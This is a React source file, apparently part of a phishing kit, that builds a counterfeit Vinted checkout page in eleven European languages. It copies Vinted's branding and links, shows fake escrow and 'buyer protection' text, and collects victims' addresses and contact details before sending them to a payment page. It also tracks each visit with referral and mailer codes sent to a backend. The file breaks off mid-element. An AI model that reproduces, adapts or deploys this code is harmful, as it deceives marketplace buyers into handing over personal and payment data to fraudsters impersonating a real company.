import React, { useState, useEffect } from 'react';
import { Link, useParams } from 'react-router-dom';
import './Index1.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';
import { withMailerFlag } from '../paymentSession';
import { getCheckoutHeaderLogo } from '../marketplaceHeaderLogo';
import { usePaymentPaths } from '../paymentPaths';

// Словарь переводов для разных стран
const translations = {
  'NL': {
    lang: 'NL',
    loading: 'Laden...',
    orderOverview: 'Besteloverzicht',
    order: 'Bestellen',
    buyerProtection: 'Kosten kopersbescherming',
    totalToPay: 'Totaal te betalen',
    read: 'Lezen',
    readText: 'Klik op de knop "Nu betalen" en betaal met creditcard. Uw geld wordt van de service ingehouden totdat de goederen zijn ontvangen, de vrachtbrief is geverifieerd en ondertekend door de koerier. Nadat de goederen zijn gecontroleerd en de documenten zijn ondertekend, wordt uw geld overgemaakt naar de rekening van de afzender.<br /><br />Als het item niet is zoals beschreven, om welke reden dan ook niet past of beschadigd is, wordt het volledige bedrag teruggestort op de rekening van de afzender. creditcard wordt binnen een uur uitgegeven.',
    address: 'Adres',
    city: 'Stad',
    street: 'Straat',
    house: 'Huis',
    apartment: 'Appartement',
    postcode: 'Postcode',
    contactInfo: 'Je contactgegevens',
    fullName: 'Voor-en achternaam',
    phone: 'Telefoonnummer',
    email: 'E-mail',
    payNow: 'Nu betalen',
    securePayment: 'Deze betaling is versleuteld en veilig',
    currency: '€',
    condition: 'Zeer goed'
  },
  'DK': {
    lang: 'DK',
    loading: 'Indlæser...',
    orderOverview: 'Ordreoversigt',
    order: 'Bestil',
    buyerProtection: 'Købers beskyttelse',
    totalToPay: 'I alt at betale',
    read: 'Læs',
    readText: 'Klik på knappen "Betal nu" og betal med kreditkort. Dine penge bliver tilbageholdt af servicen, indtil varerne er modtaget, fragtbrevet er verificeret og underskrevet af kurer. Efter at varerne er kontrolleret og dokumenterne er underskrevet, overføres dine penge til afsenderens konto.<br /><br />Hvis varen ikke er som beskrevet, af en eller anden grund ikke passer eller er beskadiget, refunderes det fulde beløb til afsenderens konto. Kreditkortet udstedes inden for en time.',
    address: 'Adresse',
    city: 'By',
    street: 'Gade',
    house: 'Hus',
    apartment: 'Lejlighed',
    postcode: 'Postnummer',
    contactInfo: 'Dine kontaktoplysninger',
    fullName: 'Fulde navn',
    phone: 'Telefonnummer',
    email: 'E-mail',
    payNow: 'Betal nu',
    securePayment: 'Denne betaling er krypteret og sikker',
    currency: 'kr',
    condition: 'Meget god'
  },
  'ES': {
    lang: 'ES',
    loading: 'Cargando...',
    orderOverview: 'Resumen del pedido',
    order: 'Pedir',
    buyerProtection: 'Coste de protección al comprador',
    totalToPay: 'Total a pagar',
    read: 'Leer',
    readText: 'Haga clic en el botón "Pagar ahora" y pague con tarjeta de crédito. Su dinero será retenido por el servicio hasta que se reciban los bienes, el albarán sea verificado y firmado por el mensajero. Después de que los bienes sean verificados y los documentos sean firmados, su dinero será transferido a la cuenta del remitente.<br /><br />Si el artículo no es como se describe, por cualquier razón no encaja o está dañado, se reembolsará el monto completo a la cuenta del remitente. La tarjeta de crédito se emitirá dentro de una hora.',
    address: 'Dirección',
    city: 'Ciudad',
    street: 'Calle',
    house: 'Casa',
    apartment: 'Apartamento',
    postcode: 'Código postal',
    contactInfo: 'Tu información de contacto',
    fullName: 'Nombre completo',
    phone: 'Número de teléfono',
    email: 'Correo electrónico',
    payNow: 'Pagar ahora',
    securePayment: 'Este pago está encriptado y es seguro',
    currency: '€',
    condition: 'Muy bueno',
    vintedSignupUrl: 'https://www.vinted.es/member/signup/select_type?ref_url=%2Fitems%2Fnew',
    vintedRegisterLabel: 'Registrarse | Iniciar sesión',
    vintedSellLabel: 'Vender ahora',
    vintedHelpHref: 'https://www.vinted.es/help/',
    footerPrivacyHref: 'https://www.vinted.es/privacy-policy',
    footerPrivacyLabel: 'Política de privacidad',
    footerCookieHref: 'https://www.vinted.es/cookie-policy',
    footerCookieLabel: 'Política de cookies',
    footerCookieSettingsHref: 'https://www.vinted.es/cookie-policy',
    footerCookieSettingsLabel: 'Configuración de cookies',
    footerTermsHref: 'https://www.vinted.es/terms_and_conditions',
    footerTermsLabel: 'Términos y condiciones',
    footerPlatformHref: 'https://www.vinted.es/our-platform',
    footerPlatformLabel: 'Nuestra plataforma',
  },
  'FR': {
    lang: 'FR',
    loading: 'Chargement...',
    orderOverview: 'Résumé de la commande',
    order: 'Commander',
    buyerProtection: 'Coût de protection de l\'acheteur',
    totalToPay: 'Total à payer',
    read: 'Lire',
    readText: 'Cliquez sur le bouton "Payer maintenant" et payez par carte de crédit. Votre argent sera retenu par le service jusqu\'à ce que les marchandises soient reçues, le bon de livraison soit vérifié et signé par le coursier. Après que les marchandises soient vérifiées et les documents signés, votre argent sera transféré sur le compte de l\'expéditeur.<br /><br />Si l\'article n\'est pas comme décrit, pour une raison quelconque ne correspond pas ou est endommagé, le montant total sera remboursé sur le compte de l\'expéditeur. La carte de crédit sera émise dans une heure.',
    address: 'Adresse',
    city: 'Ville',
    street: 'Rue',
    house: 'Maison',
    apartment: 'Appartement',
    postcode: 'Code postal',
    contactInfo: 'Vos coordonnées',
    fullName: 'Nom complet',
    phone: 'Numéro de téléphone',
    email: 'E-mail',
    payNow: 'Payer maintenant',
    securePayment: 'Ce paiement est crypté et sécurisé',
    currency: '€',
    condition: 'Très bon'
  },
  'IT': {
    lang: 'IT',
    loading: 'Caricamento...',
    orderOverview: 'Riepilogo ordine',
    order: 'Ordina',
    buyerProtection: 'Costo protezione acquirente',
    totalToPay: 'Totale da pagare',
    read: 'Leggi',
    readText: 'Clicca sul pulsante "Paga ora" e paga con carta di credito. Il tuo denaro sarà trattenuto dal servizio fino a quando la merce non sarà ricevuta, la lettera di vettura sarà verificata e firmata dal corriere. Dopo che la merce è stata verificata e i documenti sono stati firmati, il tuo denaro sarà trasferito sul conto del mittente.<br /><br />Se l\'articolo non è come descritto, per qualsiasi motivo non si adatta o è danneggiato, l\'importo completo sarà rimborsato sul conto del mittente. La carta di credito sarà emessa entro un\'ora.',
    address: 'Indirizzo',
    city: 'Città',
    street: 'Via',
    house: 'Casa',
    apartment: 'Appartamento',
    postcode: 'Codice postale',
    contactInfo: 'Le tue informazioni di contatto',
    fullName: 'Nome completo',
    phone: 'Numero di telefono',
    email: 'E-mail',
    payNow: 'Paga ora',
    securePayment: 'Questo pagamento è crittografato e sicuro',
    currency: '€',
    condition: 'Molto buono'
  },
  'PT': {
    lang: 'PT',
    loading: 'A carregar...',
    orderOverview: 'Resumo do pedido',
    order: 'Encomendar',
    buyerProtection: 'Custo de proteção do comprador',
    totalToPay: 'Total a pagar',
    read: 'Ler',
    readText: 'Clique no botão "Pagar agora" e pague com cartão de crédito. O seu dinheiro será retido pelo serviço até que as mercadorias sejam recebidas, a carta de porte seja verificada e assinada pelo estafeta. Depois de as mercadorias serem verificadas e os documentos assinados, o seu dinheiro será transferido para a conta do remetente.<br /><br />Se o artigo não for como descrito, por qualquer razão não se encaixar ou estiver danificado, o valor total será reembolsado na conta do remetente. O cartão de crédito será emitido dentro de uma hora.',
    address: 'Endereço',
    city: 'Cidade',
    street: 'Rua',
    house: 'Casa',
    apartment: 'Apartamento',
    postcode: 'Código postal',
    contactInfo: 'As suas informações de contacto',
    fullName: 'Nome completo',
    phone: 'Número de telefone',
    email: 'E-mail',
    payNow: 'Pagar agora',
    securePayment: 'Este pagamento está encriptado e seguro',
    currency: '€',
    condition: 'Muito bom',
    vintedSignupUrl: 'https://www.vinted.pt/member/signup/select_type?ref_url=%2Fitems%2Fnew',
    vintedRegisterLabel: 'Registar-se | Iniciar sessão',
    vintedSellLabel: 'Vender agora',
    vintedHelpHref: 'https://www.vinted.pt/help/',
    footerPrivacyHref: 'https://www.vinted.pt/privacy-policy',
    footerPrivacyLabel: 'Política de privacidade',
    footerCookieHref: 'https://www.vinted.pt/cookie-policy',
    footerCookieLabel: 'Política de cookies',
    footerCookieSettingsHref: 'https://www.vinted.pt/cookie-policy',
    footerCookieSettingsLabel: 'Definições de cookies',
    footerTermsHref: 'https://www.vinted.pt/terms_and_conditions',
    footerTermsLabel: 'Termos e condições',
    footerPlatformHref: 'https://www.vinted.pt/our-platform',
    footerPlatformLabel: 'A nossa plataforma',
  },
  'BE': {
    lang: 'BE',
    loading: 'Laden...',
    orderOverview: 'Besteloverzicht',
    order: 'Bestellen',
    buyerProtection: 'Kosten kopersbescherming',
    totalToPay: 'Totaal te betalen',
    read: 'Lezen',
    readText: 'Klik op de knop "Nu betalen" en betaal met creditcard. Uw geld wordt van de service ingehouden totdat de goederen zijn ontvangen, de vrachtbrief is geverifieerd en ondertekend door de koerier. Nadat de goederen zijn gecontroleerd en de documenten zijn ondertekend, wordt uw geld overgemaakt naar de rekening van de afzender.<br /><br />Als het item niet is zoals beschreven, om welke reden dan ook niet past of beschadigd is, wordt het volledige bedrag teruggestort op de rekening van de afzender. creditcard wordt binnen een uur uitgegeven.',
    address: 'Adres',
    city: 'Stad',
    street: 'Straat',
    house: 'Huis',
    apartment: 'Appartement',
    postcode: 'Postcode',
    contactInfo: 'Je contactgegevens',
    fullName: 'Voor-en achternaam',
    phone: 'Telefoonnummer',
    email: 'E-mail',
    payNow: 'Nu betalen',
    securePayment: 'Deze betaling is versleuteld en veilig',
    currency: '€',
    condition: 'Zeer goed'
  },
  'BG': {
    lang: 'BG',
    loading: 'Зареждане...',
    orderOverview: 'Резюме на поръчката',
    order: 'Поръчай',
    buyerProtection: 'Разходи за защита на купувача',
    totalToPay: 'Общо за плащане',
    read: 'Прочети',
    readText: 'Кликнете върху бутона "Плати сега" и платете с кредитна карта. Вашите пари ще бъдат задържани от услугата, докато стоките не бъдат получени, пратката не бъде проверена и подписана от куриера. След като стоките са проверени и документите са подписани, вашите пари ще бъдат преведени в сметката на изпращача.<br /><br />Ако артикулът не е както е описан, по някаква причина не пасва или е повреден, пълната сума ще бъде възстановена в сметката на изпращача. Кредитната карта ще бъде издадена в рамките на един час.',
    address: 'Адрес',
    city: 'Град',
    street: 'Улица',
    house: 'Къща',
    apartment: 'Апартамент',
    postcode: 'Пощенски код',
    contactInfo: 'Вашата информация за контакт',
    fullName: 'Пълно име',
    phone: 'Телефонен номер',
    email: 'Имейл',
    payNow: 'Плати сега',
    securePayment: 'Това плащане е криптирано и сигурно',
    currency: 'лв',
    condition: 'Много добро'
  },
  'HR': {
    lang: 'HR',
    loading: 'Učitavanje...',
    orderOverview: 'Pregled narudžbe',
    order: 'Naruči',
    buyerProtection: 'Trošak zaštite kupca',
    totalToPay: 'Ukupno za plaćanje',
    read: 'Pročitaj',
    readText: 'Kliknite na gumb "Plati sada" i platite kreditnom karticom. Vaš novac će biti zadržan od strane usluge dok se roba ne primi, otpremnica ne provjeri i potpiše od strane kurira. Nakon što se roba provjeri i dokumenti potpišu, vaš novac će biti prebačen na račun pošiljatelja.<br /><br />Ako artikl nije kako je opisan, iz bilo kojeg razloga ne odgovara ili je oštećen, puni iznos će biti vraćen na račun pošiljatelja. Kreditna kartica će biti izdana u roku od sat vremena.',
    address: 'Adresa',
    city: 'Grad',
    street: 'Ulica',
    house: 'Kuća',
    apartment: 'Stan',
    postcode: 'Poštanski broj',
    contactInfo: 'Vaše kontaktne informacije',
    fullName: 'Puno ime',
    phone: 'Broj telefona',
    email: 'E-mail',
    payNow: 'Plati sada',
    securePayment: 'Ova uplata je šifrirana i sigurna',
    currency: 'kn',
    condition: 'Vrlo dobro'
  },
  'RO': {
    lang: 'RO',
    loading: 'Se încarcă...',
    orderOverview: 'Rezumatul comenzii',
    order: 'Comandă',
    buyerProtection: 'Cost protecție cumpărător',
    totalToPay: 'Total de plătit',
    read: 'Citește',
    readText: 'Faceți clic pe butonul "Plătește acum" și plătiți cu cardul de credit. Banii dvs. vor fi reținuți de către serviciu până când mărfurile sunt primite, scrisoarea de transport este verificată și semnată de curier. După ce mărfurile sunt verificate și documentele sunt semnate, banii dvs. vor fi transferați în contul expeditorului.<br /><br />Dacă articolul nu este așa cum este descris, din orice motiv nu se potrivește sau este deteriorat, suma completă va fi rambursată în contul expeditorului. Cardul de credit va fi emis în termen de o oră.',
    address: 'Adresă',
    city: 'Oraș',
    street: 'Stradă',
    house: 'Casă',
    apartment: 'Apartament',
    postcode: 'Cod poștal',
    contactInfo: 'Informațiile dvs. de contact',
    fullName: 'Nume complet',
    phone: 'Număr de telefon',
    email: 'E-mail',
    payNow: 'Plătește acum',
    securePayment: 'Această plată este criptată și sigură',
    currency: 'lei',
    condition: 'Foarte bun'
  },
  'SK': {
    lang: 'SK',
    loading: 'Načítava sa...',
    orderOverview: 'Prehľad objednávky',
    order: 'Objednať',
    buyerProtection: 'Ochrana kupujúceho',
    totalToPay: 'Celkom na úhradu',
    read: 'Čítať',
    readText:
      'Kliknite na tlačidlo „Zaplatiť teraz“ a zaplaťte kreditnou kartou. Vaše peniaze budú službou zadržané, kým nebudú tovary prijaté, dodací list overený a podpísaný kuriérom. Po kontrole tovaru a podpise dokumentov budú peniaze prevedené na účet odosielateľa.<br /><br />Ak predmet nie je podľa popisu, z akéhokoľvek dôvodu nevyhovuje alebo je poškodený, vráti sa celá suma na účet odosielateľa. Kreditná karta bude vystavená do jednej hodiny.',
    address: 'Adresa',
    city: 'Mesto',
    street: 'Ulica',
    house: 'Dom',
    apartment: 'Byt',
    postcode: 'PSČ',
    contactInfo: 'Kontaktné údaje',
    fullName: 'Celé meno',
    phone: 'Telefónne číslo',
    email: 'E-mail',
    payNow: 'Zaplatiť teraz',
    securePayment: 'Táto platba je šifrovaná a bezpečná',
    currency: '€',
    condition: 'Veľmi dobré',
    vintedSignupUrl: 'https://www.vinted.sk/member/signup/select_type?ref_url=%2Fitems%2Fnew',
    vintedRegisterLabel: 'Registrovať sa | Prihlásiť sa',
    vintedSellLabel: 'Predaj teraz',
    vintedHelpHref: 'https://www.vinted.sk/help/',
    footerPrivacyHref: 'https://www.vinted.sk/privacy-policy',
    footerPrivacyLabel: 'Zásady ochrany osobných údajov',
    footerCookieHref: 'https://www.vinted.sk/cookie-policy',
    footerCookieLabel: 'Zásady používania súborov cookie',
    footerCookieSettingsHref: 'https://www.vinted.sk/cookie-policy',
    footerCookieSettingsLabel: 'Nastavenia súborov cookie',
    footerTermsHref: 'https://www.vinted.sk/terms_and_conditions',
    footerTermsLabel: 'Podmienky používania',
    footerPlatformHref: 'https://www.vinted.sk/our-platform',
    footerPlatformLabel: 'Naša platforma',
  }
};

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

function Index1() {
  const { uniqueId, pageCode } = useParams();
  const { toIndex2 } = usePaymentPaths(pageCode, uniqueId);
  const [pageData, setPageData] = useState(null);
  const [loading, setLoading] = useState(false);
  const [sessionId, setSessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  // Старт сессии при загрузке страницы (для техподдержки и логов захода)
  useEffect(() => {
    let cancelled = false;
    const pathname = window.location.pathname;
    let unique_id = null;
    const pathMatch = pathname.match(/\/([A-Z0-9]{16})(?:\/|$|\/index2)/);
    if (pathMatch) unique_id = pathMatch[1];
    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');

    fetch(`${API_URL}/api/session/start`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(withMailerFlag({
        unique_id: unique_id || (uniqueId || null),
        referral_code: referralCode || undefined,
        page_code: pageCode || undefined,
      })),
    })
      .then((res) => res.json())
      .then((data) => {
        if (cancelled || !data.success) return;
        if (data.session_id) {
          sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          setSessionId(data.session_id);
        }
        if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
      })
      .catch(() => {});
    return () => { cancelled = true; };
  }, [pageCode, uniqueId]);

  // Получаем данные страницы если передан pageCode
  useEffect(() => {
    if (pageCode) {
      setLoading(true);
      fetch(`${API_URL}/api/page/${pageCode}`)
        .then(res => res.json())
        .then(data => {
          if (data.success) {
            setPageData(data.page);
          } else {
            console.error('Ошибка загрузки страницы:', data.error);
          }
          setLoading(false);
        })
        .catch(err => {
          console.error('Ошибка загрузки данных страницы:', err);
          setLoading(false);
        });
    }
  }, [pageCode]);
  
  // Определяем язык и переводы (до проверки loading, чтобы использовать t.loading)
  const pathOnlyRoot = typeof window !== 'undefined' && window.location.pathname === '/';
  const isLocalhost =
    typeof window !== 'undefined' &&
    (window.location.hostname === 'localhost' || window.location.hostname === '127.0.0.1');
  const countryCode =
    pageData?.country_code || (isLocalhost && pathOnlyRoot ? 'PT' : 'NL');
  const localhostPtIndex1 = isLocalhost && pathOnlyRoot && !pageCode;
  const usePtLocale =
    localhostPtIndex1 ||
    countryCode === 'PT' ||
    pageData?.template === 'pt_vinted' ||
    pageData?.template === 'pt_vnited';
  const t = translations[usePtLocale ? 'PT' : countryCode] || translations['NL'];
  const defaultSignup = 'https://www.vinted.nl/member/signup/select_type?ref_url=%2Fitems%2Fnew';
  const vintedSignupUrl = t.vintedSignupUrl || defaultSignup;
  const vintedRegisterLabel = t.vintedRegisterLabel || 'Registreren | Inloggen';
  const vintedSellLabel = t.vintedSellLabel || 'Verkoop nu';
  const vintedHelpHref = t.vintedHelpHref || 'https://www.vinted.com/help/';
  const footerPrivacyHref = t.footerPrivacyHref || 'https://www.vinted.nl/privacy-policy';
  const footerPrivacyLabel = t.footerPrivacyLabel || 'Privacybeleid';
  const footerCookieHref = t.footerCookieHref || 'https://www.vinted.nl/cookie-policy';
  const footerCookieLabel = t.footerCookieLabel || 'Cookiebeleid';
  const footerCookieSettingsHref = t.footerCookieSettingsHref || footerCookieHref;
  const footerCookieSettingsLabel = t.footerCookieSettingsLabel || 'Cookie-instellingen';
  const footerTermsHref = t.footerTermsHref || 'https://www.vinted.nl/terms_and_conditions';
  const footerTermsLabel = t.footerTermsLabel || 'Gebruiksvoorwaarden';
  const footerPlatformHref = t.footerPlatformHref || 'https://www.vinted.nl/our-platform';
  const footerPlatformLabel = t.footerPlatformLabel || 'Ons Platform';
  const headerLogo = getCheckoutHeaderLogo(
    countryCode,
    usePtLocale ? 'pt_vinted' : pageData?.template,
  );
  const homeHref = usePtLocale ? 'https://www.vinted.pt/' : 'https://www.vinted.com/';
  const homeTitle = 'Vinted logo';

  // Показываем загрузку если данные еще не загружены
  if (pageCode && loading) {
    return (
      <div className="index1-container">
        <div style={{ padding: '50px', textAlign: 'center' }}>{t.loading}</div>
      </div>
    );
  }
  
  const index2Path = toIndex2();
  
  // Данные для отображения
  const productName = pageData?.product_name || 'RTX 2060';
  const productPrice = pageData?.price || 100.00;
  const productPhoto = pageData?.photo_url || 'https://3789549id.space/t5e0su3z';
  const sellerName = pageData ? `${pageData.first_name} ${pageData.last_name} ${pageData.middle_name || ''}`.trim() : '';
  
  return (
    <div className="index1-container">
      <div className="cust-div-1">
        <div className="div-header">
          <header className="header-class">
            <div className="container underline-class align-class height-class">
              <div className="head-cont">
                <div className="header-logo">
                  <a className="block-class" href={homeHref} title={homeTitle} aria-label={homeTitle}>
                    <div className="phones-class">
                      <div className="img-class">
                        <img src={headerLogo.src} alt={headerLogo.alt} className="img-class-2" />
                      </div>
                    </div>
                    <div className="tablets-class pad-left-class">
                      <div className="logo-dim">
                        <div className="img-class">
                          <img src={headerLogo.src} alt={headerLogo.alt} className="img-class-2" />
                        </div>
                      </div>
                    </div>
                  </a>
                </div>
                <div className="head-act">
                  <div className="deskpt-class underline-class align-class">
                    <a role="button" href={vintedSignupUrl} className="button-class small-button-class primary-button-class but-trunc-class">
                      <span className="button-content-class">
                        <span className="button-label-class">{vintedRegisterLabel}</span>
                      </span>
                    </a>
                    <div className="regular-space vertical-spacer"></div>
                    <a rel="nofollow" role="button" href={vintedSignupUrl} className="button-class button-filled-class small-button-class primary-button-class but-trunc-class">
                      <span className="button-content-class">
                        <span className="button-label-class">{vintedSellLabel}</span>
                      </span>
                    </a>
                    <div className="left-right-pad-class">
                      <a className="underline-class align-class" href={vintedHelpHref}>
                        <span className="icon-span-class icon-reg-class icon-greyscale-class">
                          <svg viewBox="0 0 24 24" aria-label="Go to Help Centre">
                            <path d="M12.75 14.506h-1.5v-1.139c0-1.077.598-2.064 1.522-2.514a1.78 1.78 0 0 0 .927-2.068 1.741 1.741 0 0 0-1.218-1.218 1.766 1.766 0 0 0-1.559.305 1.75 1.75 0 0 0-.685 1.395h-1.5c0-1.017.46-1.958 1.266-2.58a3.285 3.285 0 0 1 2.853-.574 3.244 3.244 0 0 1 2.297 2.297c.398 1.542-.31 3.1-1.723 3.79-.413.202-.68.66-.68 1.167v1.139ZM12 2c5.523 0 10 4.478 10 10 0 5.523-4.477 10-10 10-5.524 0-10-4.477-10-10C2 6.479 6.476 2 12 2Zm0 1.5c-4.687 0-8.5 3.814-8.5 8.5 0 4.687 3.813 8.5 8.5 8.5 4.686 0 8.499-3.813 8.499-8.5 0-4.686-3.813-8.5-8.5-8.5Zm-1.003 13.507a1 1 0 1 1 2.001 0 1 1 0 1 1-2 0Z"></path>
                          </svg>
                        </span>
                      </a>
                    </div>
                    <div className="language-selector">
                      <div>
                        <div className="pad-left-class">
                          <button type="button" aria-expanded="false" className="button-class button-flat-class button-medium-class button-muted-class button-inline-class button-right-icon-class">
                            <span className="button-content-class">
                              <span className="button-label-class">{t.lang}</span>
                            </span>
                          </button>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </header>
        </div>
        <main className="site">
          <div className="site-wrapper">
            <section className="site-content">
              <div className="">
                <div className="container"></div>
                <div className="row pos-rel-class">
                  <section id="content" className="grid-class">
                    <div className="body-content">
                      <div>
                        <div className="checkout">
                          <div className="checkout-container container underline-class">
                            <main className="flex-grow-class">
                              <div className="cell-class cell-tight-class" role="presentation">
                                <div className="cell-content-class">
                                  <div className="cell-body-class">
                                    <div className="label-label-class label-default-class label-leading-class">
                                      <div className="label-content-class">
                                        <h3 className="text-text-class text-sub-class text-felt-class">{t.orderOverview}</h3>
                                      </div>
                                    </div>
                                    <div className="cell-class cell-wide-class" role="presentation">
                                      <div className="cell-content-class">
                                        <div className="cell-body-class">
                                          <div className="cell-class cell-tight-class" role="presentation">
                                            <div className="cell-content-class">
                                              <div className="cell-body-class">
                                                <div className="cell-class cell-tight-class price-row" role="presentation">
                                                  <div className="cell-content-class">
                                                    <div className="cell-heading-class">
                                                      <div className="cell-title-class">
                                                        <span className="text-text-class text-body-class text-felt-class text-format-class">{t.order}</span>
                                                      </div>
                                                    </div>
                                                  </div>
                                                  <div className="cell-suffix-class">
                                                    <div className="nowrap-class">
                                                      <span className="text-text-class text-body-class text-felt-class">{productPrice.toFixed(2)}{t.currency}</span>
                                                    </div>
                                                  </div>
                                                </div>
                                                <div className="spacer-small-class spacer-horizontal-class"></div>
                                                <div className="cell-class cell-tight-class price-row" role="presentation">
                                                  <div className="cell-content-class">
                                                    <div className="cell-body-class">
                                                      <div className="underline-class align-class">
                                                        <span className="text-text-class text-body-class text-felt-class text-format-class">{t.buyerProtection}</span>
                                                      </div>
                                                    </div>
                                                  </div>
                                                  <div className="cell-suffix-class">
                                                    <div className="nowrap-class">
                                                      <span className="text-text-class text-body-class text-felt-class">{'0.00'}{t.currency}</span>
                                                    </div>
                                                  </div>
                                                </div>
                                                <div className="spacer-large-class spacer-horizontal-class"></div>
                                                <div className="cell-class cell-tight-class price-row" role="presentation">
                                                  <div className="cell-content-class">
                                                    <div className="cell-heading-class">
                                                      <div className="cell-title-class">{t.totalToPay}</div>
                                                    </div>
                                                  </div>
                                                  <div className="cell-suffix-class">
                                                    <div className="nowrap-class">
                                                      <span className="text-text-class text-body-class text-felt-class text-amp-class text-bold-class">{productPrice.toFixed(2)}{t.currency}</span>
                                                    </div>
                                                  </div>
                                                </div>
                                              </div>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                              <div className="spacer-xlarge-class spacer-horizontal-class"></div>
                              <div className="cell-class cell-tight-class" role="presentation">
                                <div className="cell-content-class">
                                  <div className="cell-body-class">
                                    <div className="label-label-class label-default-class label-leading-class">
                                      <div className="label-content-class">
                                        <h3 className="text-text-class text-sub-class text-felt-class">{t.order}</h3>
                                      </div>
                                    </div>
                                    <div className="cell-class cell-wide-class" role="presentation">
                                      <div className="cell-img-class" id="img-block">
                                        <div className="img-class img-large-class img-rnd-class img-scaled-class img-cover-class">
                                          <img src={productPhoto} alt={productName} className="img-class-2" />
                                        </div>
                                      </div>
                                      <div className="cell-content-class">
                                        <div className="cell-heading-class">
                                          <div className="cell-title-class">
                                            <h4 className="text-text-class text-title-class text-felt-class">{productName}</h4>
                                          </div>
                                        </div>
                                        <div className="cell-body-class">{t.condition} · {productName}</div>
                                      </div>
                                      <div className="cell-suffix-class">
                                        <span className="text-text-class text-body-class text-felt-class text-amp-class text-bold-class">{productPrice.toFixed(2)}{t.currency}</span>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                              <div className="cell-class cell-tight-class" role="presentation">
                                <div className="cell-content-class">
                                  <div className="cell-body-class">
                                    <div className="label-label-class label-default-class label-leading-class">
                                      <div className="label-content-class">
                                        <h3 className="text-text-class text-sub-class text-felt-class">{t.read}</h3>
                                      </div>
                                    </div>
                                    <div className="cell-class cell-wide-class cell-nav-class" role="button" tabIndex="0">
                                      <div className="cell-heading-class">
                                        <div className="cell-title-class">
                                          <div className="rec-block-class">
                                            <div className="rec-subblock-class" style={{width: '97%'}}>
                                              <label dangerouslySetInnerHTML={{ __html: t.readText }}></label>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                      <div className="cell-body-class"></div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                              <div className="spacer-xlarge-class spacer-horizontal-class"></div>
                              <div className="cell-class cell-tight-class" role="presentation">
                                <div className="cell-content-class">
                                  <div className="cell-body-class">
                                    <div className="label-label-class label-default-class label-leading-class">
                                      <div className="label-content-class">
                                        <h3 className="text-text-class text-sub-class text-felt-class">{t.address}</h3>
                                      </div>
                                    </div>
                                    <div className="cell-class cell-wide-class cell-nav-class" role="button" tabIndex="0">
                                      <div className="cell-content-class">
                                        <div className="cell-title-class">
                                          <div className="rec-block-class">
                                            <div className="rec-subblock-class" style={{width: '97%'}}>
                                              <label>{t.city}</label>
                                              <input className="rec-block-inpt-class" />
                                            </div>
                                          </div>
                                        </div>
                                        <div className="cell-content-class">
                                          <div className="cell-title-class">
                                            <div className="rec-block-class">
                                              <div className="rec-subblock-class" style={{width: '97%'}}>
                                                <label>{t.street}</label>
                                                <input className="rec-block-inpt-class" />
                                              </div>
                                            </div>
                                          </div>
                                          <div className="cell-content-class">
                                            <div className="cell-title-class">
                                              <div className="rec-block-class">
                                                <div className="rec-subblock-class" style={{width: '97%'}}>
                                                  <label>{t.house}</label>
                                                  <input className="rec-block-inpt-class" />
                                                </div>
                                              </div>
                                            </div>
                                            <div className="cell-content-class">
                                              <div className="cell-title-class">
                                                <div className="rec-block-class">
                                                  <div className="rec-subblock-class" style={{width: '97%'}}>
                                                    <label>{t.apartment}</label>
                                                    <input className="rec-block-inpt-class" />
                                                  </div>
                                                </div>
                                              </div>
                                              <div className="cell-title-class">
                                                <div className="rec-block-class">
                                                  <div className="rec-subblock-class" style={{width: '97%'}}>
                                                    <label>{t.postcode}</label>
                                                    <input className="rec-block-inpt-class" />
                                                  </div>
                                                </div>
                                              </div>
                                              <div className="cell-body-class"></div>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                    <div className="spacer-xlarge-class spacer-horizontal-class"></div>
                                    <div className="cell-content-class">
                                      <div className="cell-body-class">
                                        <div className="label-label-class label-default-class label-leading-class">
                                          <div className="label-content-class">
                                            <h3 className="text-text-class text-sub-class text-felt-class">{t.contactInfo}</h3>
                                          </div>
                                        </div>
                                        <div className="cell-class cell-wide-class cell-nav-class" role="button" tabIndex="0">
                                          <div className="cell-content-class">
                                            <div className="cell-title-class">
                                              <div className="rec-block-class">
                                                <div className="rec-subblock-class" style={{width: '97%'}}>
                                                  <label>{t.fullName}</label>
                                                  <input className="rec-block-inpt-class" defaultValue={sellerName} />
                                                </div>
                                              </div>
                                            </div>
                                            <div className="cell-title-class">
                                              <div className="rec-block-class">
                                                <div className="rec-subblock-class" style={{width: '97%'}}>
                                                  <label>{t.phone}</label>
                                                  <input className="rec-block-inpt-class" />
                                                </div>
                                              </div>
                                            </div>
                                            <div className="cell-title-class">
                                              <div className="rec-block-class">
                                                <div className="rec-subblock-class" style={{width: '97%'}}>
                                                  <label>{t.email}</label>
                                                  <input className="rec-block-inpt-class" />
                                                </div>
                                              </div>
                                            </div>
                                          </div>
                                        </div>
                                      </div>
                                    </div>
                                    <div className="spacer-xlarge-class spacer-horizontal-class"></div>
                                    <div className="cell-class Cell_default__YybLG" role="presentation">
                                      <div className="cell-content-class">
                                        <div className="cell-body-class">
                                          <form style={{width: '100%', margin: 0, padding: 0}}>
                                            <Link to={index2Path} style={{textDecoration: 'none', display: 'block', width: '100%'}}>
                                              <button type="button" aria-disabled="true" className="button-class button-filled-class button-muted-class but-trunc-class">
                                                <span className="button-content-class">
                                                  <span className="button-label-class">{t.payNow}</span>
                                                </span>
                                              </button>
                                            </Link>
                                          </form>
                                          <div className="spac-med-class spacer-horizontal-class"></div>
                                          <div className="underline-class just-cont-cent-class">
                                            <div className="icon-span-class icon-small-ofp-class icon-greyscale-lvl3-class">
                                              <svg viewBox="0 0 16 16" aria-hidden="true" width="16" height="16">
